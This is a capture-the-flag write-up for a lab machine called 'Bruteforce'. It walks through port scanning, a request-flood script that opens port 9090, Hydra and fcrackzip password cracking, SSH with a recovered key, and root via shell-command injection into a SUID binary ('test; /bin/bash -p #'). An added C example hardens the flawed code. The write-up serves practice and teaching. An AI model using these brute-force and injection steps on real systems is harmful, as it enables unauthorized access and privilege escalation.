Mazesec_Bruteforce

Target source: QQ group 660930334

Difficulty: Easy

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:18 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00048s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:ED:AA:8A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.68
Host is up (0.00060s latency).
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds

Target IP: 192.168.2.68

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800
Nmap scan report for 192.168.2.68
Host is up (0.0011s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

Open ports: 22, 80

(2) Service, script and OS detection on the open ports

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00067s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Service Unavailable
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|6.X|2.6.X|3.X (93%), MikroTik RouterOS 7.X (93%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.19 (93%), Linux 4.19 (93%), Linux 5.0 - 5.14 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 6.0 (92%), Linux 5.4 - 5.10 (87%), Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds

(3) UDP scan (top 100 ports; nothing answered, so nothing conclusive here)

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:20 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00092s latency).
All 100 scanned ports on 192.168.2.68 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

II. Web exploitation

1. HTTP service enumeration

Browsing to port 80 shows a notice that Bruteforce Node-1 is currently undergoing a firmware upgrade (matching the "Service Unavailable" title nmap reported).

2. Directory brute-force

Run a directory scan against the web root:

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.68
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: bak,php,html,js,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 1069]
maintenance.html (Status: 200) [Size: 1884]

The scan finds maintenance.html. The page says that when a spike in traffic is detected, the service on port 80 is paused and port 9090 is opened instead.

3. Exposing port 9090

So we can trigger that rule ourselves: hit port 80 with a burst of requests and force port 9090 open. The script below fires 100 requests for random (non-existent) pages inside a 10-second window, then does a plain TCP connect to 9090 to check whether the rule fired.

import requests
import time
import threading
import sys
import random
import string
import socket

TARGET_IP = "192.168.2.68"
TARGET_WEB_PORT = 80
TRIGGER_COUNT = 100   # number of requests in the burst
TIME_LIMIT = 10       # seconds; the burst has to land inside this window


def generate_random_path():
    # random 10-character page name, so every request is a different 404
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=10))


def send_brute_request(counter):
    # one request to a non-existent page on port 80; errors are ignored,
    # the point is only that the target's traffic monitor counts the hit
    try:
        url = f"http://{TARGET_IP}:{TARGET_WEB_PORT}/{generate_random_path()}.html"
        requests.get(url, timeout=2)
    except requests.exceptions.RequestException:
        pass


def check_port_open():
    # plain TCP connect to 9090 to see whether the burst tripped the rule
    print(f"\n[*] Connecting to {TARGET_IP}:9090 to verify the result...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    try:
        result = sock.connect_ex((TARGET_IP, 9090))
        if result == 0:
            print("[SUCCESS] Port 9090 is open!")
            return True
        print(f"[FAIL] Port 9090 is still closed (code: {result}).")
        return False
    except Exception as e:
        print(f"[ERROR] Connection check failed: {e}")
        return False
    finally:
        sock.close()


def main():
    print(f"[*] Starting the port 80 request burst against {TARGET_IP}")
    print(f"[*] Goal: send {TRIGGER_COUNT} requests within {TIME_LIMIT} seconds")
    threads = []
    start_time = time.time()
    for i in range(TRIGGER_COUNT):
        t = threading.Thread(target=send_brute_request, args=(i + 1,))
        threads.append(t)
        t.start()
        time.sleep(0.02)   # 100 threads * 20 ms = about 2 s of ramp-up
    print("[*] All requests sent, waiting for threads to finish...")
    for t in threads:
        t.join()
    duration = time.time() - start_time
    print(f"[*] Done. Elapsed: {duration:.2f} seconds")
    if duration > TIME_LIMIT:
        print(f"[-] Warning: took longer than {TIME_LIMIT} seconds, the rule may not have fired.")
    check_port_open()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
    main()

Scanning again confirms that port 9090 is now open:

┌──(root㉿kali)-[~/miaosec]
└─# nmap -p 9090 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:45 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00059s latency).

PORT STATE SERVICE
9090/tcp open zeus-admin
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

Browsing to port 9090 from Kali shows a login form.

It is a simple username/password form, so brute-force it with Hydra. In the http-post-form module string below the three colon-separated fields are the path, the POST body with the ^USER^ and ^PASS^ placeholders, and the failure string: Hydra reports any response that does not contain "Invalid" as a valid login, so the hit should be confirmed by logging in by hand.

┌──(root㉿kali)-[~/miaosec]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.68 -s 9090 http-post-form "/:username=^USER^&password=^PASS^:Invalid"
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-04 23:07:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.2.68:9090/:username=^USER^&password=^PASS^:Invalid
[9090][http-post-form] host: 192.168.2.68 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-04 23:07:43

Credentials found: admin:password123

After logging in, the page offers a backup file (site_backup.zip) for download.

III. Cracking the archive

Extracting the archive prompts for a password:

┌──(root㉿kali)-[~/miaosec]
└─# unzip site_backup.zip
Archive: site_backup.zip
[site_backup.zip] README.txt password:
skipping: README.txt incorrect password
skipping: ssh_login_key incorrect password

Brute-force it with fcrackzip (-D dictionary mode, -u verifies each candidate with unzip so false positives are filtered out):

┌──(root㉿kali)-[~/miaosec]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u site_backup.zip


PASSWORD FOUND!!!!: pw == rockyou

Password found: rockyou

Extract with that password; the archive contains README.txt and a file named ssh_login_key:

┌──(root㉿kali)-[~/miaosec]
└─# unzip site_backup.zip
Archive: site_backup.zip
[site_backup.zip] README.txt password:
password incorrect--reenter:
extracting: README.txt
inflating: ssh_login_key

IV. Getting a shell as ta0

ssh_login_key is an SSH private key. Combined with the hint in README.txt, the username is guessed to be ta0. The key file must be readable only by its owner (chmod 600 ssh_login_key), otherwise OpenSSH refuses to use it.

┌──(root㉿kali)-[~/miaosec]
└─# ssh -i ssh_login_key ta0@192.168.2.68
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux bruteforce 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 25 07:16:48 2026 from 192.168.56.104
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
ta0@bruteforce:~$ id
uid=1000(ta0) gid=1000(ta0) groups=1000(ta0)

V. Privilege escalation

List the SUID binaries:

ta0@bruteforce:~$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/scripts/sys_monitor

Everything else is a standard Debian SUID binary; /opt/scripts/sys_monitor is the odd one out. Running it without arguments:

ta0@bruteforce:/opt/scripts$ ./sys_monitor 
System Monitor Tool v2.0 (Secure Mode)
Usage: ./sys_monitor <auth_token> <service_name>

It wants an auth token and a service name.

Decompiling the binary gives the following pseudocode for main():

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __uid_t v4; // eax
  char s[512]; // [rsp+10h] [rbp-200h] BYREF

  if ( argc > 2 )
  {
    if ( !strcmp(argv[1], "X-MNT-9921") )
    {
      setresgid(0, 0, 0);
      setresuid(0, 0, 0);
      v4 = getuid();
      printf("[+] Identity Verified. Running as UID: %d\n", v4);
      snprintf(s, 0x200uLL, "/usr/sbin/service %s status", argv[2]);
      puts("--------------------------------");
      printf("Executing: %s\n", s);
      system(s);
      puts("--------------------------------");
      return 0;
    }
    else
    {
      puts("Access Denied.");
      return 1;
    }
  }
  else
  {
    puts("System Monitor Tool v2.0 (Secure Mode)");
    printf("Usage: %s <auth_token> <service_name>\n", *argv);
    return 1;
  }
}

The first argument has to equal the hard-coded token X-MNT-9921 to get past the check. Once inside, setresgid(0, 0, 0) and setresuid(0, 0, 0) set every uid and gid of the process to root (the binary is SUID root, so the effective uid is already 0 and the calls succeed). The second argument is meant to be a service name whose status gets checked, but it is pasted straight into the command string with snprintf and handed to system() without any filtering. system() runs the string through /bin/sh -c, so a ';' terminates the service command and whatever follows runs as root, and a trailing '#' comments out the hard-coded " status". Note that snprintf bounds the write to the 512-byte buffer, so this is command injection, not an overflow. Because the real uid is already 0 at that point, bash does not even need -p to keep the privileges; it is harmless to pass it anyway.

ta0@bruteforce:/opt/scripts$ /opt/scripts/sys_monitor X-MNT-9921 "test; /bin/bash -p #"
[+] Identity Verified. Running as UID: 0
--------------------------------
Executing: /usr/sbin/service test; /bin/bash -p # status
test: unrecognized service
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@bruteforce:/opt/scripts# id
uid=0(root) gid=0(root) groups=0(root),1000(ta0)
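As an added example (not the source of the machine's sys_monitor, which is only known from the decompiled pseudocode above), the following C reproduces the command construction that binary performs and puts a hardened variant beside it: an allowlist check on the service name and an execve()-style argv array instead of system(). The function names (build_command_vulnerable, service_name_is_safe, build_argv_safe and the two checking helpers) are assumptions made for this example. Nothing here changes privileges or executes anything; it only builds and validates the strings so the difference can be inspected.

```c
/*
 * Added example, not the target's own code. Reproduces the vulnerable
 * command construction from the decompiled sys_monitor and shows a
 * hardened alternative. Function names are assumptions for this example.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define CMD_MAX 512   /* same size as the buffer in the decompiled main() */

/* Vulnerable pattern (what sys_monitor does): the service name is pasted
 * into a shell command line that is later handed to system(). system() runs
 * the string via /bin/sh -c, so ';', '|', '&', '$(...)' and '#' in the name
 * are interpreted by the shell. Returns 1 if the string fit in the buffer. */
int build_command_vulnerable(char *out, size_t outlen, const char *service)
{
    int n = snprintf(out, outlen, "/usr/sbin/service %s status", service);
    return n >= 0 && (size_t)n < outlen;
}

/* Helper for checking: build the vulnerable string and compare it. */
int vulnerable_command_equals(const char *service, const char *expected)
{
    char buf[CMD_MAX];
    return build_command_vulnerable(buf, sizeof buf, service)
        && strcmp(buf, expected) == 0;
}

/* Hardened check: accept only a short token of [A-Za-z0-9_.@-], which
 * covers real init script names (ssh, apache2, dbus, systemd-timesyncd).
 * Every shell metacharacter, space and newline is rejected, and a leading
 * '-' is refused so the name cannot be read as an option. Returns 1 if safe. */
int service_name_is_safe(const char *service)
{
    size_t len = strlen(service);
    if (len == 0 || len > 64 || service[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)service[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == '@'))
            return 0;
    }
    return 1;
}

/* Hardened execution: do not go through system()/sh -c at all. Fill an argv
 * array for execve(), where the service name is one argument no matter what
 * it contains. The caller would fork() and execve(argv[0], argv, envp) in
 * the child. Returns 1 when argv was filled, 0 when the name was rejected. */
int build_argv_safe(const char *service, const char *argv_out[4])
{
    if (!service_name_is_safe(service))
        return 0;
    argv_out[0] = "/usr/sbin/service";
    argv_out[1] = service;
    argv_out[2] = "status";
    argv_out[3] = NULL;
    return 1;
}

/* Helper for checking: does the hardened path accept this name? */
int safe_argv_accepts(const char *service)
{
    const char *av[4];
    return build_argv_safe(service, av);
}

int main(int argc, char **argv)
{
    /* default input is the exact payload used against the machine */
    const char *name = argc > 1 ? argv[1] : "test; /bin/bash -p #";
    char cmd[CMD_MAX];
    const char *av[4];

    if (build_command_vulnerable(cmd, sizeof cmd, name))
        printf("vulnerable system() string: %s\n", cmd);
    if (build_argv_safe(name, av))
        printf("hardened argv: %s %s %s\n", av[0], av[1], av[2]);
    else
        printf("hardened path: rejected service name \"%s\"\n", name);
    return 0;
}
```

Compile with `gcc -o sysmon_demo sysmon_demo.c` and run it with the payload from above as the argument: the vulnerable path prints exactly the string sys_monitor executed, while the hardened path rejects the name. The two fixes are independent and both matter: the allowlist stops shell syntax from reaching any interpreter, and the argv array means that even an unexpected name can only ever be one argument to /usr/sbin/service.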

VI. Reading the flags

root@bruteforce:/opt/scripts# cat /root/root.txt /home/ta0/user.txt 
flag{root-5f1e9d2c8b4a7e3d0c6f9b1a5e2d8c4f}

flag{user-8a2c4e6d1b9f3a5e7d0c2b4f6a8e1d3c}

http://miao-sec.github.io/Maze-sec/Mazesec-Bruteforce/
Author: Miao
Published: 5 February 2026
License: BY-MIAO